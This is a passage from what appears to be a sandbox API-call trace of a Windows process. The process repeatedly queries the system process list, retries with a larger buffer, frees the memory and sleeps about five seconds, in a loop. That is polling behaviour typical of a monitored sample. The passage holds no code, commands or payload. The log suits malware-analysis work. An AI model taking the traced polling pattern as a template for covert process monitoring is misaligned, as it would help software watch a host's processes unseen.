SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.851] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.869] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.882] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.890] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0236.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0236.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0236.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0236.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0236.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0236.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0236.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.020] 